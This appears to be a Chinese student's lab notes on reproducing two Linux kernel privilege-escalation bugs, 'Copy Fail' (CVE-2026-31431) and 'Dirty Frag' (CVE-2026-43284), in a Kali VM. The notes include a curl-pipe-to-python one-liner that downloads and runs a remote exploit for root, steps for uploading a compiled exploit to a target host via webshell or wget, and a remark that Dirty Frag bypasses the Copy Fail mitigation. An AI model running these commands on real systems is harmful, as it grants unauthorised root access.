copy-fail和dirty-frag漏洞
CVE-2026-31431-Copy-Fail
项目地址:Copy Fail — CVE-2026-31431
https://github.com/theori-io/copy-fail-CVE-2026-31431
还热乎着还热乎着
正好kali虚拟机坏了 重新装了一个kali2026.1 好像还存在这个漏洞
复现
在linux系统中正常拿到root都是sudo su 然后输入密码
一句话跑脚本
$ curl https://copy.fail/exp | python3 && su
拿到root权限(以后忘记密码用?)
原理
非特权本地用户可以在 Linux 系统上将 4 个受控字节写入任何可读文件的页面缓存,并利用这些数据获得 root权限。
该漏洞源于 Linux 内核加密子系统 authencesn模块中的一处逻辑缺陷,攻击者仅需本地普通用户权限,通过链式利用 AF_ALG 套接字与 splice()系统调用,即可向页缓存(page cache)写入任意内容,最终实现本地提权至 root。
详细看:Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint
os:叽里咕噜说啥呢 大概是普通用户可以调用
AF_ALG和splice()然后引用啥文件的内核缓存页面 达到写入缓存的效果 再提权(?有时间再问问学长)
影响范围
漏洞利用的是Linux 内核加密模块 authencesn 在2017年引入 所以很多2017年后以linux为内核的系统都存在漏洞
补充
机房上课的时候正好刷到昨天刚出的新洞 想直接试试来着 但是没想到学校虚拟机啥也没有
万一需要提权的机器啥环境都没有 甚至没有python 现场yum install python3动静也是很大了
https://mp.weixin.qq.com/s/ZYXfYJg-XaWuOxa02BiQfA
公众号文章博主用c重写了一个 开袋即食
# 1. 上传到目标主机
# (通过 wget、curl、scp、webshell 上传等方式均可)
# 2. 赋予执行权限
chmod +x copy_fail_exp
# 3. 执行
./copy_fail_exp
虽然最后机房虚拟机没连上共享文件夹 没有试试
CVE-2026-43284-Dirty-Frag
项目地址:V4bel/dirtyfrag
热乎到烫手的 白天看长亭公众号还没分配漏洞编号 晚上看github 几小时前才更新了编号
好像也是通过页面缓存写入实现的提权 但是是调用的xfrm-ESP和RxRPC
注意,无论模块是否可用,dirty frag都可以触发。换句话说,即使在采用了公开的copy fail缓解措施(algif_aead黑名单)的系统上,你的Linux仍然容易受到Dirty Frag攻击。
简单复现一下
可能因为是修改缓存 所以在运行了exp后正常提权也变了(没有红红的root了)
但是重启之后就好了
